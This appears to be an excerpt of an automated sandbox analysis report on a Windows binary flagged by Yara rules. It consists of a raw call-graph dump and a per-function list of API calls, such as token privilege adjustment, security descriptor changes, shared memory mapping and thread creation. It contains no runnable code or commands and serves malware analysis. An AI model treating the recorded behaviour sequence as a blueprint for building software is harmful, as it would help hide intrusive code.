77146->77148 77149 111419d3 77148->77149 77150 111419ef 77149->77150 77255 11060be0 293 API calls std::_Mutex::_Mutex 77149->77255 77152 1110f420 std::_Mutex::_Mutex 265 API calls 77150->77152 77153 11141a08 77152->77153 77154 11141a24 77153->77154 77256 11060be0 293 API calls std::_Mutex::_Mutex 77153->77256 77156 11060760 268 API calls 77154->77156 77157 11141a4d 77156->77157 77158 11060760 268 API calls 77157->77158 77196 11141a67 77158->77196 77159 11141d95 77161 110d1550 268 API calls 77159->77161 77163 11142179 77159->77163 77160 110607f0 274 API calls 77160->77196 77162 11141db3 77161->77162 77168 1105dd10 79 API calls 77162->77168 77170 11060640 69 API calls 77163->77170 77164 11141d85 77165 11146450 std::_Mutex::_Mutex 21 API calls 77164->77165 77165->77159 77166 11081bb0 86 API calls 77166->77196 77167 11146450 21 API calls std::_Mutex::_Mutex 77167->77196 77169 11141df0 77168->77169 77171 11141f3d 77169->77171 77174 11060760 268 API calls 77169->77174 77172 111421d2 77170->77172 77173 11060f40 274 API calls 77171->77173 77175 11060640 69 API calls 77172->77175 77177 11141f59 77173->77177 77178 11141e0e 77174->77178 77175->77176 77176->77129 77257 110679c0 298 API calls std::_Mutex::_Mutex 77177->77257 77179 110607f0 274 API calls 77178->77179 77186 11141e1d 77179->77186 77180 111319f0 86 API calls 77180->77196 77181 11141e52 77184 11060760 268 API calls 77181->77184 77183 11146450 std::_Mutex::_Mutex 21 API calls 77183->77186 77187 11141e68 77184->77187 77185 11141f83 77188 11141fb3 EnterCriticalSection 77185->77188 77198 11141f87 77185->77198 77186->77181 77186->77183 77190 110607f0 274 API calls 77186->77190 77191 110607f0 274 API calls 77187->77191 77189 11060420 271 API calls 77188->77189 77192 11141fd0 77189->77192 77190->77186 77209 11141e78 77191->77209 77195 11060f40 274 API calls 77192->77195 77193 11081c60 86 API calls std::_Mutex::_Mutex 77193->77196 77200 11141fe6 77195->77200 77196->77159 77196->77160 77196->77164 77196->77166 77196->77167 77196->77180 77196->77193 77197 11141eb1 77199 11060760 268 API calls 77197->77199 77198->77188 77258 110508e0 365 API calls 4 library calls 77198->77258 77259 110679c0 298 API calls std::_Mutex::_Mutex 77198->77259 77201 11141ec7 77199->77201 77202 11141ffa LeaveCriticalSection 77200->77202 77206 1102a9f0 283 API calls 77200->77206 77205 110607f0 274 API calls 77201->77205 77207 1114204e 77202->77207 77208 1114200e 77202->77208 77203 11146450 std::_Mutex::_Mutex 21 API calls 77203->77209 77225 11141ed6 77205->77225 77211 11141ff7 77206->77211 77212 11133400 273 API calls 77207->77212 77208->77207 77215 11146450 std::_Mutex::_Mutex 21 API calls 77208->77215 77209->77197 77209->77203 77210 110607f0 274 API calls 77209->77210 77210->77209 77211->77202 77214 11142058 77212->77214 77213 11141f11 77217 11060640 69 API calls 77213->77217 77216 110d1550 268 API calls 77214->77216 77218 1114201c 77215->77218 77221 11142066 77216->77221 77222 11141f1f 77217->77222 77219 1113cc30 311 API calls 77218->77219 77224 11142021 77219->77224 77220 11146450 std::_Mutex::_Mutex 21 API calls 77220->77225 77260 110cff20 265 API calls std::_Mutex::_Mutex 77221->77260 77223 11060640 69 API calls 77222->77223 77226 11141f2e 77223->77226 77227 111414a0 1150 API calls 77224->77227 77225->77213 77225->77220 77228 110607f0 274 API calls 77225->77228 77230 11060640 69 API calls 77226->77230 77231 11142027 77227->77231 77228->77225 77230->77171 77231->77207 77233 11146450 std::_Mutex::_Mutex 21 API calls 77231->77233 77232 1114209c 77247 1114211f 77232->77247 77261 110d12e0 265 API calls 77232->77261 77235 11142040 77233->77235 77238 11026ba0 403 API calls 77235->77238 77236 110d07c0 265 API calls 77239 1114215b 77236->77239 77238->77207 77242 110d07c0 265 API calls 77239->77242 77242->77163 77247->77236 77253->77132 77254->77146 77255->77150 77256->77154 77257->77185 77258->77198 77259->77198 77260->77232 77263 1112c93c 77262->77263 77264 1112c977 77263->77264 77265 1112c964 77263->77265 77286 1106b860 298 API calls 77264->77286 77267 11146ee0 269 API calls 77265->77267 77268 1112c96f 77267->77268 77269 1112c9c3 77268->77269 77270 11142290 std::_Mutex::_Mutex 265 API calls 77268->77270 77269->77047 77269->77049 77270->77269 77271->77027 77272->77035 77273->77040 77274->77046 77275->77051 77276->77053 77277->77069 77278->77071 77279->77081 77280->77067 77281->77089 77282->77063 77283->77074 77284->77066 77285->77084 77286->77268 77287 11144200 77288 11144211 77287->77288 77301 11143c20 77288->77301 77292 11144295 77295 111442b2 77292->77295 77297 11144294 77292->77297 77293 1114425b 77294 11144262 ResetEvent 77293->77294 77309 11143de0 265 API calls 2 library calls 77294->77309 77297->77292 77310 11143de0 265 API calls 2 library calls 77297->77310 77298 11144276 SetEvent WaitForMultipleObjects 77298->77294 77298->77297 77300 111442af 77300->77295 77302 11143c2c GetCurrentProcess 77301->77302 77304 11143c4f 77301->77304 77303 11143c3d GetModuleFileNameA 77302->77303 77302->77304 77303->77304 77305 1110f420 std::_Mutex::_Mutex 263 API calls 77304->77305 77307 11143c79 WaitForMultipleObjects 77304->77307 77306 11143c6b 77305->77306 77306->77307 77311 11143570 GetModuleFileNameA 77306->77311 77307->77292 77307->77293 77309->77298 77310->77300 77312 111435f3 77311->77312 77313 111435b3 77311->77313 77316 111435ff LoadLibraryA 77312->77316 77317 11143619 GetModuleHandleA GetProcAddress 77312->77317 77314 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 77313->77314 77315 111435c1 77314->77315 77315->77312 77318 111435c8 LoadLibraryA 77315->77318 77316->77317 77319 1114360e LoadLibraryA 77316->77319 77320 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77317->77320 77321 11143639 77317->77321 77318->77312 77319->77317 77322 11143673 10 API calls 77320->77322 77321->77322 77323 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 77322->77323 77324 111436f0 77323->77324 77324->77307 77325 1115bde0 77326 1115bdf4 77325->77326 77327 1115bdec 77325->77327 77337 111631ab 77326->77337 77330 1115be14 77332 1115bf40 77333 11162be5 _free 66 API calls 77332->77333 77334 1115bf68 77333->77334 77335 1115be31 77335->77332 77336 1115bf24 SetLastError 77335->77336 77336->77335 77338 11170166 __calloc_crt 66 API calls 77337->77338 77339 111631c5 77338->77339 77343 1115be08 77339->77343 77361 111692ef 66 API calls __getptd_noexit 77339->77361 77341 111631d8 77341->77343 77362 111692ef 66 API calls __getptd_noexit 77341->77362 77343->77330 77343->77332 77344 1115ba20 CoInitializeSecurity CoCreateInstance 77343->77344 77345 1115ba95 wsprintfW SysAllocString 77344->77345 77346 1115bc14 77344->77346 77351 1115badb 77345->77351 77347 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 77346->77347 77349 1115bc40 77347->77349 77348 1115bc01 SysFreeString 77348->77346 77349->77335 77350 1115bbe9 77350->77348 77351->77348 77351->77350 77351->77351 77352 1115bb6c 77351->77352 77353 1115bb5a wsprintfW 77351->77353 77363 110974a0 77352->77363 77353->77352 77355 1115bb7e 77356 110974a0 266 API calls 77355->77356 77357 1115bb93 77356->77357 77368 11097550 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 77357->77368 77359 1115bbd7 77369 11097550 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 77359->77369 77361->77341 77362->77343 77364 1110f420 std::_Mutex::_Mutex 265 API calls 77363->77364 77365 110974d3 77364->77365 77366 110974e6 SysAllocString 77365->77366 77367 11097504 77365->77367 77366->77367 77367->77355 77368->77359 77369->77350 77370 1116970d 77371 1116971d 77370->77371 77372 11169718 77370->77372 77376 11169617 77371->77376 77388 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 77372->77388 77375 1116972b 77377 11169623 __alloc_osfhnd 77376->77377 77378 11169670 77377->77378 77386 111696c0 __alloc_osfhnd 77377->77386 77389 111694b3 77377->77389 77378->77386 77439 11025e20 77378->77439 77381 11169683 77382 111696a0 77381->77382 77383 11025e20 ___DllMainCRTStartup 7 API calls 77381->77383 77384 111694b3 __CRT_INIT@12 149 API calls 77382->77384 77382->77386 77385 11169697 77383->77385 77384->77386 77387 111694b3 __CRT_INIT@12 149 API calls 77385->77387 77386->77375 77387->77382 77388->77371 77390 111694bf __alloc_osfhnd 77389->77390 77391 111694c7 77390->77391 77392 11169541 77390->77392 77448 1116d4d0 HeapCreate 77391->77448 77394 111695a2 77392->77394 77398 11169547 77392->77398 77395 111695a7 77394->77395 77396 11169600 77394->77396 77399 1116b5fa ___set_flsgetvalue 3 API calls 77395->77399 77408 111694d0 __alloc_osfhnd 77396->77408 77542 1116b8fe 79 API calls __freefls@4 77396->77542 77397 111694cc 77397->77408 77449 1116b96c GetModuleHandleW 77397->77449 77400 11169565 77398->77400 77398->77408 77536 1116d79b 66 API calls _doexit 77398->77536 77403 111695ac 77399->77403 77401 11169579 77400->77401 77537 1117140e 67 API calls _free 77400->77537 77540 1116958c 70 API calls __mtterm 77401->77540 77409 11169dbe __calloc_crt 66 API calls 77403->77409 77408->77378 77413 111695b8 77409->77413 77410 111694dc __RTC_Initialize 77411 111694e0 77410->77411 77418 111694ec GetCommandLineA 77410->77418 77533 1116d4ee HeapDestroy 77411->77533 77412 1116956f 77538 1116b64b 70 API calls _free 77412->77538 77413->77408 77416 111695c4 DecodePointer 77413->77416 77419 111695d9 77416->77419 77417 11169574 77539 1116d4ee HeapDestroy 77417->77539 77474 11176f92 GetEnvironmentStringsW 77418->77474 77422 111695f4 77419->77422 77423 111695dd 77419->77423 77426 11162be5 _free 66 API calls 77422->77426 77541 1116b688 66 API calls 4 library calls 77423->77541 77426->77408 77428 111695e4 GetCurrentThreadId 77428->77408 77430 1116950a 77534 1116b64b 70 API calls _free 77430->77534 77434 1116952a 77434->77408 77535 1117140e 67 API calls _free 77434->77535 77440 1110f7d0 77439->77440 77441 1110f7f1 77440->77441 77442 1110f7dc 77440->77442 77443 1110f804 ___DllMainCRTStartup 77440->77443 77559 1110f720 77441->77559 77442->77443 77445 1110f720 ___DllMainCRTStartup 7 API calls 77442->77445 77443->77381 77447 1110f7e5 77445->77447 77446 1110f7f8 77446->77381 77447->77381 77448->77397 77450 1116b980 77449->77450 77451 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77449->77451 77543 1116b64b 70 API calls _free 77450->77543 77453 1116b9d3 TlsAlloc 77451->77453 77456 1116bae2 77453->77456 77457 1116ba21 TlsSetValue 77453->77457 77454 1116b985 77454->77410 77456->77410 77457->77456 77458 1116ba32 77457->77458 77544 1116d557 EncodePointer EncodePointer __init_pointers __initp_misc_winsig 77458->77544 77460 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 77545 111735c2 InitializeCriticalSectionAndSpinCount 77460->77545 77462 1116ba76 77463 1116badd 77462->77463 77464 1116ba7a DecodePointer 77462->77464 77547 1116b64b 70 API calls _free 77463->77547 77466 1116ba8f 77464->77466 77466->77463 77467 11169dbe __calloc_crt 66 API calls 77466->77467 77468 1116baa5 77467->77468 77468->77463 77469 1116baad DecodePointer 77468->77469 77470 1116babe 77469->77470 77470->77463 77471 1116bac2 77470->77471 77546 1116b688 66 API calls 4 library calls 77471->77546 77473 1116baca GetCurrentThreadId 77473->77456 77475 11176fae WideCharToMultiByte 77474->77475 77479 111694fc 77474->77479 77477 11176fe3 77475->77477 77478 1117701b FreeEnvironmentStringsW 77475->77478 77480 11169d79 __malloc_crt 66 API calls 77477->77480 77478->77479 77487 111711c9 GetStartupInfoW 77479->77487 77481 11176fe9 77480->77481 77481->77478 77482 11176ff1 WideCharToMultiByte 77481->77482 77483 11177003 77482->77483 77484 1117700f FreeEnvironmentStringsW 77482->77484 77485 11162be5 _free 66 API calls 77483->77485 77484->77479 77486 1117700b 77485->77486 77486->77484 77488 11169dbe __calloc_crt 66 API calls 77487->77488 77489 111711e7 77488->77489 77489->77489 77490 1117135c 77489->77490 77492 11169dbe __calloc_crt 66 API calls 77489->77492 77495 11169506 77489->77495 77496 111712dc 77489->77496 77491 11171392 GetStdHandle 77490->77491 77493 111713f6 SetHandleCount 77490->77493 77494 111713a4 GetFileType 77490->77494 77499 111713ca InitializeCriticalSectionAndSpinCount 77490->77499 77491->77490 77492->77489 77493->77495 77494->77490 77495->77430 77500 11176ed7 77495->77500 77496->77490 77497 11171313 InitializeCriticalSectionAndSpinCount 77496->77497 77498 11171308 GetFileType 77496->77498 77497->77495 77497->77496 77498->77496 77498->77497 77499->77490 77499->77495 77501 11176ef1 GetModuleFileNameA 77500->77501 77502 11176eec 77500->77502 77503 11176f18 77501->77503 77554 11170be7 94 API calls __setmbcp 77502->77554 77548 11176d3d 77503->77548 77506 11169516 77506->77434 77511 11176c61 77506->77511 77508 11169d79 __malloc_crt 66 API calls 77509 11176f5a 77508->77509 77509->77506 77510 11176d3d _parse_cmdline 76 API calls 77509->77510 77510->77506 77512 11176c6a 77511->77512 77515 11176c6f _strlen 77511->77515 77556 11170be7 94 API calls __setmbcp 77512->77556 77514 11169dbe __calloc_crt 66 API calls 77520 11176ca4 _strlen 77514->77520 77515->77514 77518 1116951f 77515->77518 77516 11176cf3 77517 11162be5 _free 66 API calls 77516->77517 77517->77518 77518->77434 77527 1116d5ae 77518->77527 77519 11169dbe __calloc_crt 66 API calls 77519->77520 77520->77516 77520->77518 77520->77519 77521 11176d19 77520->77521 77523 1116be9f _strcpy_s 66 API calls 77520->77523 77524 11176d30 77520->77524 77522 11162be5 _free 66 API calls 77521->77522 77522->77518 77523->77520 77525 1116deb2 __invoke_watson 10 API calls 77524->77525 77526 11176d3c 77525->77526 77530 1116d5bc __IsNonwritableInCurrentImage 77527->77530 77529 1116d5da __initterm_e 77532 1116d5fb __IsNonwritableInCurrentImage 77529->77532 77558 11162f15 76 API calls __cinit 77529->77558 77557 1116c9cb EncodePointer 77530->77557 77532->77434 77533->77408 77534->77411 77535->77430 77536->77400 77537->77412 77538->77417 77539->77401 77540->77408 77541->77428 77542->77408 77543->77454 77544->77460 77545->77462 77546->77473 77547->77456 77550 11176d5c 77548->77550 77552 11176dc9 77550->77552 77555 111766ce 76 API calls x_ismbbtype_l 77550->77555 77551 11176ec7 77551->77506 77551->77508 77552->77551 77553 111766ce 76 API calls _parse_cmdline 77552->77553 77553->77552 77554->77501 77555->77550 77556->77515 77557->77529 77558->77532 77560 1110f764 EnterCriticalSection 77559->77560 77561 1110f74f InitializeCriticalSection 77559->77561 77562 1110f785 77560->77562 77561->77560 77563 1110f7b3 LeaveCriticalSection 77562->77563 77564 1110f6c0 ___DllMainCRTStartup 4 API calls 77562->77564 77563->77446 77564->77562 77565 110304b8 77566 11142a60 267 API calls 77565->77566 77567 110304c6 77566->77567 77568 11142bb0 86 API calls 77567->77568 77569 11030503 77568->77569 77570 11030518 77569->77570 77571 11081bb0 86 API calls 77569->77571 77572 110ed1a0 8 API calls 77570->77572 77571->77570 77573 1103053f 77572->77573 77574 11030589 77573->77574 77637 110ed250 81 API calls 2 library calls 77573->77637 77577 11142bb0 86 API calls 77574->77577 77576 11030554 77638 110ed250 81 API calls 2 library calls 77576->77638 77580 110305a0 77577->77580 77579 1103056b 77579->77574 77581 111463d0 19 API calls 77579->77581 77582 1110f420 std::_Mutex::_Mutex 265 API calls 77580->77582 77581->77574 77583 110305af 77582->77583 77584 110305d0 77583->77584 77639 11088860 268 API calls 77583->77639 77616 1108a470 77584->77616 77587 110305e3 OpenMutexA 77588 11030603 CreateMutexA 77587->77588 77589 1103071a CloseHandle 77587->77589 77590 11030623 77588->77590 77591 1108a570 69 API calls 77589->77591 77592 1110f420 std::_Mutex::_Mutex 265 API calls 77590->77592 77594 11030730 77591->77594 77593 11030638 77592->77593 77595 1103065b 77593->77595 77640 11060be0 293 API calls std::_Mutex::_Mutex 77593->77640 77597 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 77594->77597 77627 11015c30 LoadLibraryA 77595->77627 77599 110310b3 77597->77599 77600 1103066d 77601 111450a0 std::_Mutex::_Mutex 90 API calls 77600->77601 77602 1103067c 77601->77602 77603 11030689 77602->77603 77604 1103069c 77602->77604 77628 11145ae0 77603->77628 77606 110306a6 GetProcAddress 77604->77606 77607 11030690 77604->77607 77606->77607 77608 110306c0 SetLastError 77606->77608 77609 110281a0 47 API calls 77607->77609 77608->77607 77610 110306cd 77609->77610 77641 110092f0 427 API calls std::_Mutex::_Mutex 77610->77641 77612 110306dc 77613 110306f0 WaitForSingleObject 77612->77613 77613->77613 77614 11030702 CloseHandle 77613->77614 77614->77589 77615 11030713 FreeLibrary 77614->77615 77615->77589 77617 1110f420 std::_Mutex::_Mutex 265 API calls 77616->77617 77618 1108a4a7 77617->77618 77619 1108a4c9 InitializeCriticalSection 77618->77619 77621 1110f420 std::_Mutex::_Mutex 265 API calls 77618->77621 77622 1108a52a 77619->77622 77623 1108a4c2 77621->77623 77622->77587 77623->77619 77642 1116219a 66 API calls std::exception::_Copy_str 77623->77642 77625 1108a4f9 77643 111625f1 RaiseException 77625->77643 77627->77600 77629 111450a0 std::_Mutex::_Mutex 90 API calls 77628->77629 77630 11145af2 77629->77630 77631 11145b30 77630->77631 77632 11145af9 LoadLibraryA 77630->77632 77631->77607 77633 11145b2a 77632->77633 77634 11145b0b GetProcAddress 77632->77634 77633->77607 77635 11145b23 FreeLibrary 77634->77635 77636 11145b1b 77634->77636 77635->77633 77636->77635 77637->77576 77638->77579 77639->77584 77640->77595 77641->77612 77642->77625 77643->77619 77644 6d031dfc 77645 6d03c840 77644->77645 77646 6d031e0b 77644->77646 77649 6d031d3f 77646->77649 77648 6d031e16 77650 6d031d4b 77649->77650 77651 6d03b8b1 77650->77651 77652 6d031d57 77650->77652 77681 6d03b359 HeapCreate 77651->77681 77653 6d031d61 77652->77653 77674 6d03b8fd 77652->77674 77655 6d032967 77653->77655 77656 6d031d6a __set_flsgetvalue TlsGetValue 77653->77656 77658 6d032970 __freeptd 77655->77658 77663 6d031dd1 77655->77663 77659 6d031d83 77656->77659 77657 6d057448 _cexit 77660 6d047b4e 77657->77660 77658->77663 77659->77663 77675 6d031e1c 77659->77675 77664 6d047b5c 77660->77664 77683 6d0a6d78 DeleteCriticalSection free 77660->77683 77663->77648 77682 6d0a6d78 DeleteCriticalSection free 77664->77682 77667 6d031d9f DecodePointer 77669 6d031db4 77667->77669 77668 6d03b8b6 77668->77664 77673 6d03b8dd GetCommandLineA GetCommandLineW 77668->77673 77671 6d057484 free 77669->77671 77672 6d031dbc _initptd GetCurrentThreadId 77669->77672 77670 6d057457 77670->77671 77671->77664 77672->77663 77673->77674 77674->77657 77674->77660 77674->77664 77677 6d031e25 77675->77677 77678 6d031d93 77677->77678 77679 6d05f1d0 Sleep 77677->77679 77684 6d0309a9 77677->77684 77678->77664 77678->77667 77680 6d031e45 77679->77680 77680->77677 77680->77678 77681->77668 77682->77664 77683->77670 77685 6d0309c5 77684->77685 77686 6d0309b5 77684->77686 77688 6d0309df RtlAllocateHeap 77685->77688 77689 6d0309f6 77685->77689 77690 6d05f3f5 _callnewh 77685->77690 77686->77685 77687 6d05f3d7 _errno 77686->77687 77687->77677 77688->77685 77688->77689 77689->77677 77690->77685 77690->77689

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 721 1109e812-1109e82d call 11161d01 720->721 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->728 729 1109e805-1109e80b call 1109d4d0 726->729 730 1109e316-1109e33b CreateFileMappingA 727->730 731 1109e2fa-1109e310 728->731 732 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->732 729->720 734 1109e388-1109e39b GetLastError 730->734 735 1109e33d-1109e35d GetLastError call 1112ef20 730->735 731->730 762 1109e2e9-1109e2f1 732->762 763 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 732->763 737 1109e39d 734->737 738 1109e3a2-1109e3b9 MapViewOfFile 734->738 748 1109e368-1109e370 735->748 749 1109e35f-1109e366 LocalFree 735->749 737->738 741 1109e3bb-1109e3d6 call 1112ef20 738->741 742 1109e3f7-1109e3ff 738->742 765 1109e3d8-1109e3d9 LocalFree 741->765 766 1109e3db-1109e3e3 741->766 746 1109e4a1-1109e4b3 742->746 747 1109e405-1109e41e GetModuleFileNameA 742->747 750 1109e4f9-1109e512 call 11161d20 GetTickCount 746->750 751 1109e4b5-1109e4b8 746->751 752 1109e4bd-1109e4d8 call 1112ef20 747->752 753 1109e424-1109e42d 747->753 754 1109e372-1109e373 LocalFree 748->754 755 1109e375-1109e37f 748->755 749->748 781 1109e514-1109e519 750->781 758 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 751->758 779 1109e4da-1109e4db LocalFree 752->779 780 1109e4dd-1109e4e5 752->780 753->752 759 1109e433-1109e436 753->759 754->755 761 1109e7fe-1109e800 call 1109d8c0 755->761 783 1109e60b-1109e622 CreateEventA 758->783 784 1109e605 758->784 768 1109e479-1109e49c call 1112ef20 call 1109d8c0 759->768 769 1109e438-1109e43c 759->769 761->729 762->731 773 1109e2f3-1109e2f4 FreeLibrary 762->773 763->762 772 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 763->772 765->766 775 1109e3e8-1109e3f2 766->775 776 1109e3e5-1109e3e6 LocalFree 766->776 768->746 769->768 778 1109e43e-1109e449 769->778 772->762 773->731 775->761 776->775 785 1109e450-1109e454 778->785 779->780 786 1109e4ea-1109e4f4 780->786 787 1109e4e7-1109e4e8 LocalFree 780->787 788 1109e51b-1109e52a 781->788 789 1109e52c 781->789 793 1109e624-1109e643 GetLastError * 2 call 1112ef20 783->793 794 1109e646-1109e64e 783->794 784->783 791 1109e470-1109e472 785->791 792 1109e456-1109e458 785->792 786->761 787->786 788->781 788->789 795 1109e52e-1109e534 789->795 800 1109e475-1109e477 791->800 797 1109e45a-1109e460 792->797 798 1109e46c-1109e46e 792->798 793->794 801 1109e650 794->801 802 1109e656-1109e667 CreateEventA 794->802 803 1109e545-1109e59d 795->803 804 1109e536-1109e543 795->804 797->791 805 1109e462-1109e46a 797->805 798->800 800->752 800->768 801->802 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 802->807 808 1109e68b-1109e693 802->808 803->758 804->795 804->803 805->785 805->798 807->808 809 1109e69b-1109e6ad CreateEventA 808->809 810 1109e695 808->810 812 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 809->812 813 1109e6d1-1109e6d9 809->813 810->809 812->813 816 1109e6db 813->816 817 1109e6e1-1109e6f2 CreateEventA 813->817 816->817 819 1109e714-1109e722 817->819 820 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->820 822 1109e724-1109e725 LocalFree 819->822 823 1109e727-1109e72f 819->823 820->819 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 829 1109e74c-1109e74f 827->829 828->761 829->828 832 1109e755-1109e758 829->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->761 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
                                                                                  APIs
                                                                                    • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,AD96CFBE,00080000,00000000,00000000), ref: 1109D46D
                                                                                    • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                    • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                    • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                  • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,AD96CFBE,00080000,00000000,00000000), ref: 1109E225
                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                  • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                  • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                  • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                  • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                  • GetLastError.KERNEL32 ref: 1109E33D
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                  • GetLastError.KERNEL32 ref: 1109E390
                                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                    • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                    • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                  • _memset.LIBCMT ref: 1109E500
                                                                                  • GetTickCount.KERNEL32 ref: 1109E508
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                  • GetLastError.KERNEL32 ref: 1109E624
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                  • GetLastError.KERNEL32 ref: 1109E669
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                  • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                  • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                  • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                  • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                  • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
